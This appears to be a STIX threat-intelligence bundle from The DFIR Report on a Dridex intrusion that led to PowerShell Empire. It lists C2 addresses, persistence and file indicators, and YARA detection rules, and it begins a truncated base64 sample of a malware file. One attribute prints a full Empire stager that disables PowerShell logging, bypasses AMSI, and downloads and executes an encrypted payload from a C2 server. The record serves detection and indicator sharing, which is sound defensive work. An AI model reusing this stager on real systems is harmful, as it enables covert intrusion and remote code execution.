misp-circl-feed/feeds/circl/stix-2.1/946e7701-5bdd-4efe-ae94-a6626fc8092b.json

1986 lines
2.1 MiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--946e7701-5bdd-4efe-ae94-a6626fc8092b",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T20:04:33.000Z",
"modified": "2020-08-03T20:04:33.000Z",
"name": "The DFIR Report",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--946e7701-5bdd-4efe-ae94-a6626fc8092b",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T20:04:33.000Z",
"modified": "2020-08-03T20:04:33.000Z",
"name": "Dridex to Empire",
"published": "2020-08-03T20:05:47Z",
"object_refs": [
"x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"indicator--39f56fa9-58f9-4962-a4e9-809182990f7d",
"indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af",
"indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268",
"indicator--ef331607-0a3d-4770-b9da-33708b3e1a10",
"indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"indicator--587aa626-f57e-444e-b1c1-ab3491f99a10",
"indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1",
"indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92",
"indicator--c176ce15-acd2-4573-9991-8e19d4953c4f",
"indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"indicator--931290f5-12fd-493e-802f-4e9e132a6a0d",
"indicator--80882b5d-a04b-4963-a324-e9778acbaec6",
"indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"indicator--be484895-ebf6-4a2d-b492-e8810cd8f793",
"indicator--46037d3e-727a-4508-8dcb-d10de58a764f",
"indicator--612fb261-eeee-4173-a89d-074aad7c64d2",
"indicator--513494bf-37dd-4704-a5ea-15155c29c4fc",
"indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69",
"indicator--7b2b9772-9059-4651-84e8-bc066e15b917",
"indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2",
"indicator--9bb216ae-af15-4cba-9d65-40be296d9438",
"indicator--aec61910-1c29-47c5-88c9-37621ded62dd",
"indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"x-misp-object--0537282b-b524-441b-bc04-7b894b342a40",
"x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6",
"x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239",
"x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786",
"x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff",
"x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31",
"x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867",
"x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251",
"x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2",
"x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f",
"x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c",
"x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1",
"x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0",
"x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218",
"x-misp-object--072b4d8e-b602-458e-9a96-71242a752828"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"Dridex",
"Powershell Empire",
"misp-galaxy:tool=\"Dridex\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T19:55:43.000Z",
"modified": "2020-07-15T19:55:43.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--39f56fa9-58f9-4962-a4e9-809182990f7d",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:32:15.000Z",
"modified": "2020-07-15T20:32:15.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '194.99.22.145']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:32:15Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"Powershell Empire"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:31:54.000Z",
"modified": "2020-07-15T20:31:54.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '64.118.8.15']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:31:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:31:49.000Z",
"modified": "2020-07-15T20:31:49.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '59.148.253.194']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:31:49Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ef331607-0a3d-4770-b9da-33708b3e1a10",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-21T02:21:32.000Z",
"modified": "2020-07-21T02:21:32.000Z",
"pattern": "[windows-registry-key:key = '\\\\HKEY_USERS\\\\S-1-5-21-1761595937-4212512506-1431507687-12106\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Zvhlxdonjwfvei']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-21T02:21:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Persistence mechanism"
}
],
"labels": [
"misp:type=\"regkey\"",
"misp:category=\"Persistence mechanism\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-21T02:22:45.000Z",
"modified": "2020-07-21T02:22:45.000Z",
"pattern": "[file:name = '\\\\%APPDATA\\\\%\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\swET\\\\bdechangepin.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-21T02:22:45Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload installation"
}
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload installation\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:22.000Z",
"modified": "2020-08-03T01:22:22.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.58.16.87']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:22Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--587aa626-f57e-444e-b1c1-ab3491f99a10",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:22.000Z",
"modified": "2020-08-03T01:22:22.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.168.239.42']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:22Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:21.000Z",
"modified": "2020-08-03T01:22:21.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '216.52.109.40']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:21.000Z",
"modified": "2020-08-03T01:22:21.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.221.43']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:21.000Z",
"modified": "2020-08-03T01:22:21.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.131.103.128']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:20.000Z",
"modified": "2020-08-03T01:22:20.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '54.39.34.24']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:20.000Z",
"modified": "2020-08-03T01:22:20.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '192.99.103.228']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c176ce15-acd2-4573-9991-8e19d4953c4f",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:22:20.000Z",
"modified": "2020-08-03T01:22:20.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.80.178.251']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:22:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T01:20:19.000Z",
"modified": "2020-08-03T01:20:19.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '75.170.61.45']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T01:20:19Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--931290f5-12fd-493e-802f-4e9e132a6a0d",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T10:20:57.000Z",
"modified": "2020-08-03T10:20:57.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '199.66.90.63']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T10:20:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--80882b5d-a04b-4963-a324-e9778acbaec6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T10:20:34.000Z",
"modified": "2020-08-03T10:20:34.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.223.244']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T10:20:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T10:20:09.000Z",
"modified": "2020-08-03T10:20:09.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '209.74.126.2']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T10:20:09Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Dridex",
"kill-chain:Command and Control"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T20:04:33.000Z",
"modified": "2020-08-03T20:04:33.000Z",
"pattern": "[/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"<ms:script implements-prefix=\\\"user\\\" language=\\\"JScript\\\">\" fullword wide\r\n $s6 = \"]]> </ms:script>\" fullword wide\r\n $s7 = \"</ms:script>\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide
"pattern_type": "yara",
2023-12-14 14:30:15 +00:00
"pattern_version": "2.1",
2023-04-21 14:44:17 +00:00
"valid_from": "2020-08-03T20:04:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T12:30:56.000Z",
"modified": "2020-08-03T12:30:56.000Z",
"first_observed": "2020-08-03T12:30:56Z",
"last_observed": "2020-08-03T12:30:56Z",
"number_observed": 1,
"object_refs": [
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5938cc58-c427-4a29-808b-fcdfcd62ff7d",
"value": "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--be484895-ebf6-4a2d-b492-e8810cd8f793",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:09:07.000Z",
"modified": "2020-07-15T20:09:07.000Z",
"pattern": "[file:hashes.MD5 = '92cc8b22a89cc560963407b482443b76' AND file:hashes.SHA1 = '8b0c0b84222571a70ca65c0e3e8cf459c80406fc' AND file:hashes.SHA256 = '5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a' AND file:hashes.SHA512 = '2246f494a57b0cb1623c7eb0c7dc11ca8424ad166c99cf87c7528e425167297266cf7fe56d342756560d4e5de9b1ab2d989527b0581b79edf910519cbb973475' AND file:hashes.SSDEEP = '3072:toADcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESenxxgSrYGRQJSwrruPK:qA26hB5gBZ74XQN99enxxgShRW6i' AND file:name = 'ufo.exe' AND file:size = '217088' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAA6h71BRtskHiu4CAABQAwAgABwAOTJjYzhiMjJhODljYzU2MDk2MzQwN2I0ODI0NDNiNzZVVAkAAzxiD188Yg9fdXgLAAEEIQAAAAQhAAAA0zIKgFQ8wzHj/YR1PvlHLFBiZwgzy9w9SYK0fADtkG5jbfiwPN03BJmf2NcHhR0gLYxaOkwdFw17sZkHIUNArOA3B8KCVc7unl0/4JBjYIqt+PgPXGd2pe5t1teSmcksxfyqTLr1lIRqS/4lyitqAPUPh7ruq/aNjpwG66cOxIT+Mzotf0PcxE+xSzanud7z3PSqrsBJ4Enaucq3nGCCtxc0zmnmwBczmLj2ieDnb+re+F+5d0bjTtf6JiH+yl5wBlrSMhcOW2obrSF6zsMLgLJrjYFbOHb7J73daay6Dza8JAlm0BliOpo9toZ9LKTZhPpfHZ3QvvlZV/brhrm7BSQ5rOkBKuNVnIdYc6UL3vIMTYVjZ6Pt/rijDZQ6dVnsBPgkyBGKmobjgL0ShVkOH/pJtGSqBmA3kL+403Zjx5z7aK6d6cdyhXGzoQOHfDhsTCHBSw2HZi1WXa/2M08wEkvE3Y5ip5OPkvHzludTQen4Ea2aakiOcBjtkz4gTQb69+yMsf+SNU44EwXOsS/bRzQofG/rOKEmiQutMcQoVsgEeN9PUQrcXUB3wNsdzl9GqvNlCBjGPwR47h/FLslvv0TGr+YwwA3PzxSs2cHe+7sFM3Kva0dV031THw75ZfG5MFm9ErdwDGLkYc34BVAIL7x6tg4g0WCpQFdcYuCT8umeP5RFP+bLz28AAQKZaJLkmldPoQu1O9K+IcZkN+XTWI07vOsoQuH7+lGzPc7eXfnx1ZJQGiTCcPayKFC5k5qB4NqRJrnEjuBQSAVLO11zBV9E7iT7wjop55EXfos9SkJ1YJxSjMnxfUjEAWv1vA2/+3bLFhPiSbZCE8eYcX0tD+uW8AkNFTpXieYfKu6Wl742SiMYH6m2P2DsIyFrDoanC4CwhBvS+Bjz86rio/Xl0y8RbJ0eqpFiZN2BjN/hyvBRpaDOyp84StydX/teTyeH4mDZPyvY82GABsz7oW2OkG8yHjhj8CoejqLRyF0qN5Fr+CwvNuKTtf5GKLem+ArwZoRAHlp38TMZnTzcgUdEYCW4A5cpJEC/Edjde+P6MGv9+mHwKCgX7zgRcgLD1sbGoLrWoe9df5FKZne9/31ORp/MsketYQfe9wXhWA/y3SMSYHVz4+SjrqF74HyWxDXujpPr73sNOW9rZq4NtOkulNZ0hNCyuvbjQjgbXBlZW1Ui58y5oBDsg2DwJH3h3yBLfktpis+lyMJF2GYjvQyWl/A